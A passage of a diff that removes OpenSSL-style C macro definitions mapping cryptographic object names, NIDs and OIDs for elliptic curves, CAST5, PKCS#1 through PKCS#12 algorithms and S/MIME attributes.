-#define NID_sect571r1		734
-#define OBJ_sect571r1		OBJ_secg_ellipticCurve,39L
-
-#define OBJ_wap_wsg_idm_ecid		OBJ_wap_wsg,4L
-
-#define SN_wap_wsg_idm_ecid_wtls1		"wap-wsg-idm-ecid-wtls1"
-#define NID_wap_wsg_idm_ecid_wtls1		735
-#define OBJ_wap_wsg_idm_ecid_wtls1		OBJ_wap_wsg_idm_ecid,1L
-
-#define SN_wap_wsg_idm_ecid_wtls3		"wap-wsg-idm-ecid-wtls3"
-#define NID_wap_wsg_idm_ecid_wtls3		736
-#define OBJ_wap_wsg_idm_ecid_wtls3		OBJ_wap_wsg_idm_ecid,3L
-
-#define SN_wap_wsg_idm_ecid_wtls4		"wap-wsg-idm-ecid-wtls4"
-#define NID_wap_wsg_idm_ecid_wtls4		737
-#define OBJ_wap_wsg_idm_ecid_wtls4		OBJ_wap_wsg_idm_ecid,4L
-
-#define SN_wap_wsg_idm_ecid_wtls5		"wap-wsg-idm-ecid-wtls5"
-#define NID_wap_wsg_idm_ecid_wtls5		738
-#define OBJ_wap_wsg_idm_ecid_wtls5		OBJ_wap_wsg_idm_ecid,5L
-
-#define SN_wap_wsg_idm_ecid_wtls6		"wap-wsg-idm-ecid-wtls6"
-#define NID_wap_wsg_idm_ecid_wtls6		739
-#define OBJ_wap_wsg_idm_ecid_wtls6		OBJ_wap_wsg_idm_ecid,6L
-
-#define SN_wap_wsg_idm_ecid_wtls7		"wap-wsg-idm-ecid-wtls7"
-#define NID_wap_wsg_idm_ecid_wtls7		740
-#define OBJ_wap_wsg_idm_ecid_wtls7		OBJ_wap_wsg_idm_ecid,7L
-
-#define SN_wap_wsg_idm_ecid_wtls8		"wap-wsg-idm-ecid-wtls8"
-#define NID_wap_wsg_idm_ecid_wtls8		741
-#define OBJ_wap_wsg_idm_ecid_wtls8		OBJ_wap_wsg_idm_ecid,8L
-
-#define SN_wap_wsg_idm_ecid_wtls9		"wap-wsg-idm-ecid-wtls9"
-#define NID_wap_wsg_idm_ecid_wtls9		742
-#define OBJ_wap_wsg_idm_ecid_wtls9		OBJ_wap_wsg_idm_ecid,9L
-
-#define SN_wap_wsg_idm_ecid_wtls10		"wap-wsg-idm-ecid-wtls10"
-#define NID_wap_wsg_idm_ecid_wtls10		743
-#define OBJ_wap_wsg_idm_ecid_wtls10		OBJ_wap_wsg_idm_ecid,10L
-
-#define SN_wap_wsg_idm_ecid_wtls11		"wap-wsg-idm-ecid-wtls11"
-#define NID_wap_wsg_idm_ecid_wtls11		744
-#define OBJ_wap_wsg_idm_ecid_wtls11		OBJ_wap_wsg_idm_ecid,11L
-
-#define SN_wap_wsg_idm_ecid_wtls12		"wap-wsg-idm-ecid-wtls12"
-#define NID_wap_wsg_idm_ecid_wtls12		745
-#define OBJ_wap_wsg_idm_ecid_wtls12		OBJ_wap_wsg_idm_ecid,12L
-
-#define SN_cast5_cbc		"CAST5-CBC"
-#define LN_cast5_cbc		"cast5-cbc"
-#define NID_cast5_cbc		108
-#define OBJ_cast5_cbc		OBJ_ISO_US,113533L,7L,66L,10L
-
-#define SN_cast5_ecb		"CAST5-ECB"
-#define LN_cast5_ecb		"cast5-ecb"
-#define NID_cast5_ecb		109
-
-#define SN_cast5_cfb64		"CAST5-CFB"
-#define LN_cast5_cfb64		"cast5-cfb"
-#define NID_cast5_cfb64		110
-
-#define SN_cast5_ofb64		"CAST5-OFB"
-#define LN_cast5_ofb64		"cast5-ofb"
-#define NID_cast5_ofb64		111
-
-#define LN_pbeWithMD5AndCast5_CBC		"pbeWithMD5AndCast5CBC"
-#define NID_pbeWithMD5AndCast5_CBC		112
-#define OBJ_pbeWithMD5AndCast5_CBC		OBJ_ISO_US,113533L,7L,66L,12L
-
-#define SN_id_PasswordBasedMAC		"id-PasswordBasedMAC"
-#define LN_id_PasswordBasedMAC		"password based MAC"
-#define NID_id_PasswordBasedMAC		782
-#define OBJ_id_PasswordBasedMAC		OBJ_ISO_US,113533L,7L,66L,13L
-
-#define SN_id_DHBasedMac		"id-DHBasedMac"
-#define LN_id_DHBasedMac		"Diffie-Hellman based MAC"
-#define NID_id_DHBasedMac		783
-#define OBJ_id_DHBasedMac		OBJ_ISO_US,113533L,7L,66L,30L
-
-#define SN_rsadsi		"rsadsi"
-#define LN_rsadsi		"RSA Data Security, Inc."
-#define NID_rsadsi		1
-#define OBJ_rsadsi		OBJ_ISO_US,113549L
-
-#define SN_pkcs		"pkcs"
-#define LN_pkcs		"RSA Data Security, Inc. PKCS"
-#define NID_pkcs		2
-#define OBJ_pkcs		OBJ_rsadsi,1L
-
-#define SN_pkcs1		"pkcs1"
-#define NID_pkcs1		186
-#define OBJ_pkcs1		OBJ_pkcs,1L
-
-#define LN_rsaEncryption		"rsaEncryption"
-#define NID_rsaEncryption		6
-#define OBJ_rsaEncryption		OBJ_pkcs1,1L
-
-#define SN_md2WithRSAEncryption		"RSA-MD2"
-#define LN_md2WithRSAEncryption		"md2WithRSAEncryption"
-#define NID_md2WithRSAEncryption		7
-#define OBJ_md2WithRSAEncryption		OBJ_pkcs1,2L
-
-#define SN_md4WithRSAEncryption		"RSA-MD4"
-#define LN_md4WithRSAEncryption		"md4WithRSAEncryption"
-#define NID_md4WithRSAEncryption		396
-#define OBJ_md4WithRSAEncryption		OBJ_pkcs1,3L
-
-#define SN_md5WithRSAEncryption		"RSA-MD5"
-#define LN_md5WithRSAEncryption		"md5WithRSAEncryption"
-#define NID_md5WithRSAEncryption		8
-#define OBJ_md5WithRSAEncryption		OBJ_pkcs1,4L
-
-#define SN_sha1WithRSAEncryption		"RSA-SHA1"
-#define LN_sha1WithRSAEncryption		"sha1WithRSAEncryption"
-#define NID_sha1WithRSAEncryption		65
-#define OBJ_sha1WithRSAEncryption		OBJ_pkcs1,5L
-
-#define SN_rsaesOaep		"RSAES-OAEP"
-#define LN_rsaesOaep		"rsaesOaep"
-#define NID_rsaesOaep		919
-#define OBJ_rsaesOaep		OBJ_pkcs1,7L
-
-#define SN_mgf1		"MGF1"
-#define LN_mgf1		"mgf1"
-#define NID_mgf1		911
-#define OBJ_mgf1		OBJ_pkcs1,8L
-
-#define SN_rsassaPss		"RSASSA-PSS"
-#define LN_rsassaPss		"rsassaPss"
-#define NID_rsassaPss		912
-#define OBJ_rsassaPss		OBJ_pkcs1,10L
-
-#define SN_sha256WithRSAEncryption		"RSA-SHA256"
-#define LN_sha256WithRSAEncryption		"sha256WithRSAEncryption"
-#define NID_sha256WithRSAEncryption		668
-#define OBJ_sha256WithRSAEncryption		OBJ_pkcs1,11L
-
-#define SN_sha384WithRSAEncryption		"RSA-SHA384"
-#define LN_sha384WithRSAEncryption		"sha384WithRSAEncryption"
-#define NID_sha384WithRSAEncryption		669
-#define OBJ_sha384WithRSAEncryption		OBJ_pkcs1,12L
-
-#define SN_sha512WithRSAEncryption		"RSA-SHA512"
-#define LN_sha512WithRSAEncryption		"sha512WithRSAEncryption"
-#define NID_sha512WithRSAEncryption		670
-#define OBJ_sha512WithRSAEncryption		OBJ_pkcs1,13L
-
-#define SN_sha224WithRSAEncryption		"RSA-SHA224"
-#define LN_sha224WithRSAEncryption		"sha224WithRSAEncryption"
-#define NID_sha224WithRSAEncryption		671
-#define OBJ_sha224WithRSAEncryption		OBJ_pkcs1,14L
-
-#define SN_pkcs3		"pkcs3"
-#define NID_pkcs3		27
-#define OBJ_pkcs3		OBJ_pkcs,3L
-
-#define LN_dhKeyAgreement		"dhKeyAgreement"
-#define NID_dhKeyAgreement		28
-#define OBJ_dhKeyAgreement		OBJ_pkcs3,1L
-
-#define SN_pkcs5		"pkcs5"
-#define NID_pkcs5		187
-#define OBJ_pkcs5		OBJ_pkcs,5L
-
-#define SN_pbeWithMD2AndDES_CBC		"PBE-MD2-DES"
-#define LN_pbeWithMD2AndDES_CBC		"pbeWithMD2AndDES-CBC"
-#define NID_pbeWithMD2AndDES_CBC		9
-#define OBJ_pbeWithMD2AndDES_CBC		OBJ_pkcs5,1L
-
-#define SN_pbeWithMD5AndDES_CBC		"PBE-MD5-DES"
-#define LN_pbeWithMD5AndDES_CBC		"pbeWithMD5AndDES-CBC"
-#define NID_pbeWithMD5AndDES_CBC		10
-#define OBJ_pbeWithMD5AndDES_CBC		OBJ_pkcs5,3L
-
-#define SN_pbeWithMD2AndRC2_CBC		"PBE-MD2-RC2-64"
-#define LN_pbeWithMD2AndRC2_CBC		"pbeWithMD2AndRC2-CBC"
-#define NID_pbeWithMD2AndRC2_CBC		168
-#define OBJ_pbeWithMD2AndRC2_CBC		OBJ_pkcs5,4L
-
-#define SN_pbeWithMD5AndRC2_CBC		"PBE-MD5-RC2-64"
-#define LN_pbeWithMD5AndRC2_CBC		"pbeWithMD5AndRC2-CBC"
-#define NID_pbeWithMD5AndRC2_CBC		169
-#define OBJ_pbeWithMD5AndRC2_CBC		OBJ_pkcs5,6L
-
-#define SN_pbeWithSHA1AndDES_CBC		"PBE-SHA1-DES"
-#define LN_pbeWithSHA1AndDES_CBC		"pbeWithSHA1AndDES-CBC"
-#define NID_pbeWithSHA1AndDES_CBC		170
-#define OBJ_pbeWithSHA1AndDES_CBC		OBJ_pkcs5,10L
-
-#define SN_pbeWithSHA1AndRC2_CBC		"PBE-SHA1-RC2-64"
-#define LN_pbeWithSHA1AndRC2_CBC		"pbeWithSHA1AndRC2-CBC"
-#define NID_pbeWithSHA1AndRC2_CBC		68
-#define OBJ_pbeWithSHA1AndRC2_CBC		OBJ_pkcs5,11L
-
-#define LN_id_pbkdf2		"PBKDF2"
-#define NID_id_pbkdf2		69
-#define OBJ_id_pbkdf2		OBJ_pkcs5,12L
-
-#define LN_pbes2		"PBES2"
-#define NID_pbes2		161
-#define OBJ_pbes2		OBJ_pkcs5,13L
-
-#define LN_pbmac1		"PBMAC1"
-#define NID_pbmac1		162
-#define OBJ_pbmac1		OBJ_pkcs5,14L
-
-#define SN_pkcs7		"pkcs7"
-#define NID_pkcs7		20
-#define OBJ_pkcs7		OBJ_pkcs,7L
-
-#define LN_pkcs7_data		"pkcs7-data"
-#define NID_pkcs7_data		21
-#define OBJ_pkcs7_data		OBJ_pkcs7,1L
-
-#define LN_pkcs7_signed		"pkcs7-signedData"
-#define NID_pkcs7_signed		22
-#define OBJ_pkcs7_signed		OBJ_pkcs7,2L
-
-#define LN_pkcs7_enveloped		"pkcs7-envelopedData"
-#define NID_pkcs7_enveloped		23
-#define OBJ_pkcs7_enveloped		OBJ_pkcs7,3L
-
-#define LN_pkcs7_signedAndEnveloped		"pkcs7-signedAndEnvelopedData"
-#define NID_pkcs7_signedAndEnveloped		24
-#define OBJ_pkcs7_signedAndEnveloped		OBJ_pkcs7,4L
-
-#define LN_pkcs7_digest		"pkcs7-digestData"
-#define NID_pkcs7_digest		25
-#define OBJ_pkcs7_digest		OBJ_pkcs7,5L
-
-#define LN_pkcs7_encrypted		"pkcs7-encryptedData"
-#define NID_pkcs7_encrypted		26
-#define OBJ_pkcs7_encrypted		OBJ_pkcs7,6L
-
-#define SN_pkcs9		"pkcs9"
-#define NID_pkcs9		47
-#define OBJ_pkcs9		OBJ_pkcs,9L
-
-#define LN_pkcs9_emailAddress		"emailAddress"
-#define NID_pkcs9_emailAddress		48
-#define OBJ_pkcs9_emailAddress		OBJ_pkcs9,1L
-
-#define LN_pkcs9_unstructuredName		"unstructuredName"
-#define NID_pkcs9_unstructuredName		49
-#define OBJ_pkcs9_unstructuredName		OBJ_pkcs9,2L
-
-#define LN_pkcs9_contentType		"contentType"
-#define NID_pkcs9_contentType		50
-#define OBJ_pkcs9_contentType		OBJ_pkcs9,3L
-
-#define LN_pkcs9_messageDigest		"messageDigest"
-#define NID_pkcs9_messageDigest		51
-#define OBJ_pkcs9_messageDigest		OBJ_pkcs9,4L
-
-#define LN_pkcs9_signingTime		"signingTime"
-#define NID_pkcs9_signingTime		52
-#define OBJ_pkcs9_signingTime		OBJ_pkcs9,5L
-
-#define LN_pkcs9_countersignature		"countersignature"
-#define NID_pkcs9_countersignature		53
-#define OBJ_pkcs9_countersignature		OBJ_pkcs9,6L
-
-#define LN_pkcs9_challengePassword		"challengePassword"
-#define NID_pkcs9_challengePassword		54
-#define OBJ_pkcs9_challengePassword		OBJ_pkcs9,7L
-
-#define LN_pkcs9_unstructuredAddress		"unstructuredAddress"
-#define NID_pkcs9_unstructuredAddress		55
-#define OBJ_pkcs9_unstructuredAddress		OBJ_pkcs9,8L
-
-#define LN_pkcs9_extCertAttributes		"extendedCertificateAttributes"
-#define NID_pkcs9_extCertAttributes		56
-#define OBJ_pkcs9_extCertAttributes		OBJ_pkcs9,9L
-
-#define SN_ext_req		"extReq"
-#define LN_ext_req		"Extension Request"
-#define NID_ext_req		172
-#define OBJ_ext_req		OBJ_pkcs9,14L
-
-#define SN_SMIMECapabilities		"SMIME-CAPS"
-#define LN_SMIMECapabilities		"S/MIME Capabilities"
-#define NID_SMIMECapabilities		167
-#define OBJ_SMIMECapabilities		OBJ_pkcs9,15L
-
-#define SN_SMIME		"SMIME"
-#define LN_SMIME		"S/MIME"
-#define NID_SMIME		188
-#define OBJ_SMIME		OBJ_pkcs9,16L
-
-#define SN_id_smime_mod		"id-smime-mod"
-#define NID_id_smime_mod		189
-#define OBJ_id_smime_mod		OBJ_SMIME,0L
-
-#define SN_id_smime_ct		"id-smime-ct"
-#define NID_id_smime_ct		190
-#define OBJ_id_smime_ct		OBJ_SMIME,1L
-
-#define SN_id_smime_aa		"id-smime-aa"
-#define NID_id_smime_aa		191
-#define OBJ_id_smime_aa		OBJ_SMIME,2L
-
-#define SN_id_smime_alg		"id-smime-alg"
-#define NID_id_smime_alg		192
-#define OBJ_id_smime_alg		OBJ_SMIME,3L
-
-#define SN_id_smime_cd		"id-smime-cd"
-#define NID_id_smime_cd		193
-#define OBJ_id_smime_cd		OBJ_SMIME,4L
-
-#define SN_id_smime_spq		"id-smime-spq"
-#define NID_id_smime_spq		194
-#define OBJ_id_smime_spq		OBJ_SMIME,5L
-
-#define SN_id_smime_cti		"id-smime-cti"
-#define NID_id_smime_cti		195
-#define OBJ_id_smime_cti		OBJ_SMIME,6L
-
-#define SN_id_smime_mod_cms		"id-smime-mod-cms"
-#define NID_id_smime_mod_cms		196
-#define OBJ_id_smime_mod_cms		OBJ_id_smime_mod,1L
-
-#define SN_id_smime_mod_ess		"id-smime-mod-ess"
-#define NID_id_smime_mod_ess		197
-#define OBJ_id_smime_mod_ess		OBJ_id_smime_mod,2L
-
-#define SN_id_smime_mod_oid		"id-smime-mod-oid"
-#define NID_id_smime_mod_oid		198
-#define OBJ_id_smime_mod_oid		OBJ_id_smime_mod,3L
-
-#define SN_id_smime_mod_msg_v3		"id-smime-mod-msg-v3"
-#define NID_id_smime_mod_msg_v3		199
-#define OBJ_id_smime_mod_msg_v3		OBJ_id_smime_mod,4L
-
-#define SN_id_smime_mod_ets_eSignature_88		"id-smime-mod-ets-eSignature-88"
-#define NID_id_smime_mod_ets_eSignature_88		200
-#define OBJ_id_smime_mod_ets_eSignature_88		OBJ_id_smime_mod,5L
-
-#define SN_id_smime_mod_ets_eSignature_97		"id-smime-mod-ets-eSignature-97"
-#define NID_id_smime_mod_ets_eSignature_97		201
-#define OBJ_id_smime_mod_ets_eSignature_97		OBJ_id_smime_mod,6L
-
-#define SN_id_smime_mod_ets_eSigPolicy_88		"id-smime-mod-ets-eSigPolicy-88"
-#define NID_id_smime_mod_ets_eSigPolicy_88		202
-#define OBJ_id_smime_mod_ets_eSigPolicy_88		OBJ_id_smime_mod,7L
-
-#define SN_id_smime_mod_ets_eSigPolicy_97		"id-smime-mod-ets-eSigPolicy-97"
-#define NID_id_smime_mod_ets_eSigPolicy_97		203
-#define OBJ_id_smime_mod_ets_eSigPolicy_97		OBJ_id_smime_mod,8L
-
-#define SN_id_smime_ct_receipt		"id-smime-ct-receipt"
-#define NID_id_smime_ct_receipt		204
-#define OBJ_id_smime_ct_receipt		OBJ_id_smime_ct,1L
-
-#define SN_id_smime_ct_authData		"id-smime-ct-authData"
-#define NID_id_smime_ct_authData		205
-#define OBJ_id_smime_ct_authData		OBJ_id_smime_ct,2L
-
-#define SN_id_smime_ct_publishCert		"id-smime-ct-publishCert"
-#define NID_id_smime_ct_publishCert		206
-#define OBJ_id_smime_ct_publishCert		OBJ_id_smime_ct,3L
-
-#define SN_id_smime_ct_TSTInfo		"id-smime-ct-TSTInfo"
-#define NID_id_smime_ct_TSTInfo		207
-#define OBJ_id_smime_ct_TSTInfo		OBJ_id_smime_ct,4L
-
-#define SN_id_smime_ct_TDTInfo		"id-smime-ct-TDTInfo"
-#define NID_id_smime_ct_TDTInfo		208
-#define OBJ_id_smime_ct_TDTInfo		OBJ_id_smime_ct,5L
-
-#define SN_id_smime_ct_contentInfo		"id-smime-ct-contentInfo"
-#define NID_id_smime_ct_contentInfo		209
-#define OBJ_id_smime_ct_contentInfo		OBJ_id_smime_ct,6L
-
-#define SN_id_smime_ct_DVCSRequestData		"id-smime-ct-DVCSRequestData"
-#define NID_id_smime_ct_DVCSRequestData		210
-#define OBJ_id_smime_ct_DVCSRequestData		OBJ_id_smime_ct,7L
-
-#define SN_id_smime_ct_DVCSResponseData		"id-smime-ct-DVCSResponseData"
-#define NID_id_smime_ct_DVCSResponseData		211
-#define OBJ_id_smime_ct_DVCSResponseData		OBJ_id_smime_ct,8L
-
-#define SN_id_smime_ct_compressedData		"id-smime-ct-compressedData"
-#define NID_id_smime_ct_compressedData		786
-#define OBJ_id_smime_ct_compressedData		OBJ_id_smime_ct,9L
-
-#define SN_id_ct_asciiTextWithCRLF		"id-ct-asciiTextWithCRLF"
-#define NID_id_ct_asciiTextWithCRLF		787
-#define OBJ_id_ct_asciiTextWithCRLF		OBJ_id_smime_ct,27L
-
-#define SN_id_smime_aa_receiptRequest		"id-smime-aa-receiptRequest"
-#define NID_id_smime_aa_receiptRequest		212
-#define OBJ_id_smime_aa_receiptRequest		OBJ_id_smime_aa,1L
-
-#define SN_id_smime_aa_securityLabel		"id-smime-aa-securityLabel"
-#define NID_id_smime_aa_securityLabel		213
-#define OBJ_id_smime_aa_securityLabel		OBJ_id_smime_aa,2L
-
-#define SN_id_smime_aa_mlExpandHistory		"id-smime-aa-mlExpandHistory"
-#define NID_id_smime_aa_mlExpandHistory		214
-#define OBJ_id_smime_aa_mlExpandHistory		OBJ_id_smime_aa,3L
-
-#define SN_id_smime_aa_contentHint		"id-smime-aa-contentHint"
-#define NID_id_smime_aa_contentHint		215
-#define OBJ_id_smime_aa_contentHint		OBJ_id_smime_aa,4L
-
-#define SN_id_smime_aa_msgSigDigest		"id-smime-aa-msgSigDigest"
-#define NID_id_smime_aa_msgSigDigest		216
-#define OBJ_id_smime_aa_msgSigDigest		OBJ_id_smime_aa,5L
-
-#define SN_id_smime_aa_encapContentType		"id-smime-aa-encapContentType"
-#define NID_id_smime_aa_encapContentType		217
-#define OBJ_id_smime_aa_encapContentType		OBJ_id_smime_aa,6L
-
-#define SN_id_smime_aa_contentIdentifier		"id-smime-aa-contentIdentifier"
-#define NID_id_smime_aa_contentIdentifier		218
-#define OBJ_id_smime_aa_contentIdentifier		OBJ_id_smime_aa,7L
-
-#define SN_id_smime_aa_macValue		"id-smime-aa-macValue"
-#define NID_id_smime_aa_macValue		219
-#define OBJ_id_smime_aa_macValue		OBJ_id_smime_aa,8L
-
-#define SN_id_smime_aa_equivalentLabels		"id-smime-aa-equivalentLabels"
-#define NID_id_smime_aa_equivalentLabels		220
-#define OBJ_id_smime_aa_equivalentLabels		OBJ_id_smime_aa,9L
-
-#define SN_id_smime_aa_contentReference		"id-smime-aa-contentReference"
-#define NID_id_smime_aa_contentReference		221
-#define OBJ_id_smime_aa_contentReference		OBJ_id_smime_aa,10L
-
-#define SN_id_smime_aa_encrypKeyPref		"id-smime-aa-encrypKeyPref"
-#define NID_id_smime_aa_encrypKeyPref		222
-#define OBJ_id_smime_aa_encrypKeyPref		OBJ_id_smime_aa,11L
-
-#define SN_id_smime_aa_signingCertificate		"id-smime-aa-signingCertificate"
-#define NID_id_smime_aa_signingCertificate		223
-#define OBJ_id_smime_aa_signingCertificate		OBJ_id_smime_aa,12L
-
-#define SN_id_smime_aa_smimeEncryptCerts		"id-smime-aa-smimeEncryptCerts"
-#define NID_id_smime_aa_smimeEncryptCerts		224
-#define OBJ_id_smime_aa_smimeEncryptCerts		OBJ_id_smime_aa,13L
-
-#define SN_id_smime_aa_timeStampToken		"id-smime-aa-timeStampToken"
-#define NID_id_smime_aa_timeStampToken		225
-#define OBJ_id_smime_aa_timeStampToken		OBJ_id_smime_aa,14L
-
-#define SN_id_smime_aa_ets_sigPolicyId		"id-smime-aa-ets-sigPolicyId"
-#define NID_id_smime_aa_ets_sigPolicyId		226
-#define OBJ_id_smime_aa_ets_sigPolicyId		OBJ_id_smime_aa,15L
-
-#define SN_id_smime_aa_ets_commitmentType		"id-smime-aa-ets-commitmentType"
-#define NID_id_smime_aa_ets_commitmentType		227
-#define OBJ_id_smime_aa_ets_commitmentType		OBJ_id_smime_aa,16L
-
-#define SN_id_smime_aa_ets_signerLocation		"id-smime-aa-ets-signerLocation"
-#define NID_id_smime_aa_ets_signerLocation		228
-#define OBJ_id_smime_aa_ets_signerLocation		OBJ_id_smime_aa,17L
-
-#define SN_id_smime_aa_ets_signerAttr		"id-smime-aa-ets-signerAttr"
-#define NID_id_smime_aa_ets_signerAttr		229
-#define OBJ_id_smime_aa_ets_signerAttr		OBJ_id_smime_aa,18L
-
-#define SN_id_smime_aa_ets_otherSigCert		"id-smime-aa-ets-otherSigCert"
-#define NID_id_smime_aa_ets_otherSigCert		230
-#define OBJ_id_smime_aa_ets_otherSigCert		OBJ_id_smime_aa,19L
-
-#define SN_id_smime_aa_ets_contentTimestamp		"id-smime-aa-ets-contentTimestamp"
-#define NID_id_smime_aa_ets_contentTimestamp		231
-#define OBJ_id_smime_aa_ets_contentTimestamp		OBJ_id_smime_aa,20L
-
-#define SN_id_smime_aa_ets_CertificateRefs		"id-smime-aa-ets-CertificateRefs"
-#define NID_id_smime_aa_ets_CertificateRefs		232
-#define OBJ_id_smime_aa_ets_CertificateRefs		OBJ_id_smime_aa,21L
-
-#define SN_id_smime_aa_ets_RevocationRefs		"id-smime-aa-ets-RevocationRefs"
-#define NID_id_smime_aa_ets_RevocationRefs		233
-#define OBJ_id_smime_aa_ets_RevocationRefs		OBJ_id_smime_aa,22L
-
-#define SN_id_smime_aa_ets_certValues		"id-smime-aa-ets-certValues"
-#define NID_id_smime_aa_ets_certValues		234
-#define OBJ_id_smime_aa_ets_certValues		OBJ_id_smime_aa,23L
-
-#define SN_id_smime_aa_ets_revocationValues		"id-smime-aa-ets-revocationValues"
-#define NID_id_smime_aa_ets_revocationValues		235
-#define OBJ_id_smime_aa_ets_revocationValues		OBJ_id_smime_aa,24L
-
-#define SN_id_smime_aa_ets_escTimeStamp		"id-smime-aa-ets-escTimeStamp"
-#define NID_id_smime_aa_ets_escTimeStamp		236
-#define OBJ_id_smime_aa_ets_escTimeStamp		OBJ_id_smime_aa,25L
-
-#define SN_id_smime_aa_ets_certCRLTimestamp		"id-smime-aa-ets-certCRLTimestamp"
-#define NID_id_smime_aa_ets_certCRLTimestamp		237
-#define OBJ_id_smime_aa_ets_certCRLTimestamp		OBJ_id_smime_aa,26L
-
-#define SN_id_smime_aa_ets_archiveTimeStamp		"id-smime-aa-ets-archiveTimeStamp"
-#define NID_id_smime_aa_ets_archiveTimeStamp		238
-#define OBJ_id_smime_aa_ets_archiveTimeStamp		OBJ_id_smime_aa,27L
-
-#define SN_id_smime_aa_signatureType		"id-smime-aa-signatureType"
-#define NID_id_smime_aa_signatureType		239
-#define OBJ_id_smime_aa_signatureType		OBJ_id_smime_aa,28L
-
-#define SN_id_smime_aa_dvcs_dvc		"id-smime-aa-dvcs-dvc"
-#define NID_id_smime_aa_dvcs_dvc		240
-#define OBJ_id_smime_aa_dvcs_dvc		OBJ_id_smime_aa,29L
-
-#define SN_id_smime_alg_ESDHwith3DES		"id-smime-alg-ESDHwith3DES"
-#define NID_id_smime_alg_ESDHwith3DES		241
-#define OBJ_id_smime_alg_ESDHwith3DES		OBJ_id_smime_alg,1L
-
-#define SN_id_smime_alg_ESDHwithRC2		"id-smime-alg-ESDHwithRC2"
-#define NID_id_smime_alg_ESDHwithRC2		242
-#define OBJ_id_smime_alg_ESDHwithRC2		OBJ_id_smime_alg,2L
-
-#define SN_id_smime_alg_3DESwrap		"id-smime-alg-3DESwrap"
-#define NID_id_smime_alg_3DESwrap		243
-#define OBJ_id_smime_alg_3DESwrap		OBJ_id_smime_alg,3L
-
-#define SN_id_smime_alg_RC2wrap		"id-smime-alg-RC2wrap"
-#define NID_id_smime_alg_RC2wrap		244
-#define OBJ_id_smime_alg_RC2wrap		OBJ_id_smime_alg,4L
-
-#define SN_id_smime_alg_ESDH		"id-smime-alg-ESDH"
-#define NID_id_smime_alg_ESDH		245
-#define OBJ_id_smime_alg_ESDH		OBJ_id_smime_alg,5L
-
-#define SN_id_smime_alg_CMS3DESwrap		"id-smime-alg-CMS3DESwrap"
-#define NID_id_smime_alg_CMS3DESwrap		246
-#define OBJ_id_smime_alg_CMS3DESwrap		OBJ_id_smime_alg,6L
-
-#define SN_id_smime_alg_CMSRC2wrap		"id-smime-alg-CMSRC2wrap"
-#define NID_id_smime_alg_CMSRC2wrap		247
-#define OBJ_id_smime_alg_CMSRC2wrap		OBJ_id_smime_alg,7L
-
-#define SN_id_alg_PWRI_KEK		"id-alg-PWRI-KEK"
-#define NID_id_alg_PWRI_KEK		893
-#define OBJ_id_alg_PWRI_KEK		OBJ_id_smime_alg,9L
-
-#define SN_id_smime_cd_ldap		"id-smime-cd-ldap"
-#define NID_id_smime_cd_ldap		248
-#define OBJ_id_smime_cd_ldap		OBJ_id_smime_cd,1L
-
-#define SN_id_smime_spq_ets_sqt_uri		"id-smime-spq-ets-sqt-uri"
-#define NID_id_smime_spq_ets_sqt_uri		249
-#define OBJ_id_smime_spq_ets_sqt_uri		OBJ_id_smime_spq,1L
-
-#define SN_id_smime_spq_ets_sqt_unotice		"id-smime-spq-ets-sqt-unotice"
-#define NID_id_smime_spq_ets_sqt_unotice		250
-#define OBJ_id_smime_spq_ets_sqt_unotice		OBJ_id_smime_spq,2L
-
-#define SN_id_smime_cti_ets_proofOfOrigin		"id-smime-cti-ets-proofOfOrigin"
-#define NID_id_smime_cti_ets_proofOfOrigin		251
-#define OBJ_id_smime_cti_ets_proofOfOrigin		OBJ_id_smime_cti,1L
-
-#define SN_id_smime_cti_ets_proofOfReceipt		"id-smime-cti-ets-proofOfReceipt"
-#define NID_id_smime_cti_ets_proofOfReceipt		252
-#define OBJ_id_smime_cti_ets_proofOfReceipt		OBJ_id_smime_cti,2L
-
-#define SN_id_smime_cti_ets_proofOfDelivery		"id-smime-cti-ets-proofOfDelivery"
-#define NID_id_smime_cti_ets_proofOfDelivery		253
-#define OBJ_id_smime_cti_ets_proofOfDelivery		OBJ_id_smime_cti,3L
-
-#define SN_id_smime_cti_ets_proofOfSender		"id-smime-cti-ets-proofOfSender"
-#define NID_id_smime_cti_ets_proofOfSender		254
-#define OBJ_id_smime_cti_ets_proofOfSender		OBJ_id_smime_cti,4L
-
-#define SN_id_smime_cti_ets_proofOfApproval		"id-smime-cti-ets-proofOfApproval"
-#define NID_id_smime_cti_ets_proofOfApproval		255
-#define OBJ_id_smime_cti_ets_proofOfApproval		OBJ_id_smime_cti,5L
-
-#define SN_id_smime_cti_ets_proofOfCreation		"id-smime-cti-ets-proofOfCreation"
-#define NID_id_smime_cti_ets_proofOfCreation		256
-#define OBJ_id_smime_cti_ets_proofOfCreation		OBJ_id_smime_cti,6L
-
-#define LN_friendlyName		"friendlyName"
-#define NID_friendlyName		156
-#define OBJ_friendlyName		OBJ_pkcs9,20L
-
-#define LN_localKeyID		"localKeyID"
-#define NID_localKeyID		157
-#define OBJ_localKeyID		OBJ_pkcs9,21L
-
-#define SN_ms_csp_name		"CSPName"
-#define LN_ms_csp_name		"Microsoft CSP Name"
-#define NID_ms_csp_name		417
-#define OBJ_ms_csp_name		1L,3L,6L,1L,4L,1L,311L,17L,1L
-
-#define SN_LocalKeySet		"LocalKeySet"
-#define LN_LocalKeySet		"Microsoft Local Key set"
-#define NID_LocalKeySet		856
-#define OBJ_LocalKeySet		1L,3L,6L,1L,4L,1L,311L,17L,2L
-
-#define OBJ_certTypes		OBJ_pkcs9,22L
-
-#define LN_x509Certificate		"x509Certificate"
-#define NID_x509Certificate		158
-#define OBJ_x509Certificate		OBJ_certTypes,1L
-
-#define LN_sdsiCertificate		"sdsiCertificate"
-#define NID_sdsiCertificate		159
-#define OBJ_sdsiCertificate		OBJ_certTypes,2L
-
-#define OBJ_crlTypes		OBJ_pkcs9,23L
-
-#define LN_x509Crl		"x509Crl"
-#define NID_x509Crl		160
-#define OBJ_x509Crl		OBJ_crlTypes,1L
-
-#define OBJ_pkcs12		OBJ_pkcs,12L
-
-#define OBJ_pkcs12_pbeids		OBJ_pkcs12,1L
-
-#define SN_pbe_WithSHA1And128BitRC4		"PBE-SHA1-RC4-128"
-#define LN_pbe_WithSHA1And128BitRC4		"pbeWithSHA1And128BitRC4"
-#define NID_pbe_WithSHA1And128BitRC4		144
-#define OBJ_pbe_WithSHA1And128BitRC4		OBJ_pkcs12_pbeids,1L
-
-#define SN_pbe_WithSHA1And40BitRC4		"PBE-SHA1-RC4-40"
-#define LN_pbe_WithSHA1And40BitRC4		"pbeWithSHA1And40BitRC4"
-#define NID_pbe_WithSHA1And40BitRC4		145
-#define OBJ_pbe_WithSHA1And40BitRC4		OBJ_pkcs12_pbeids,2L
-
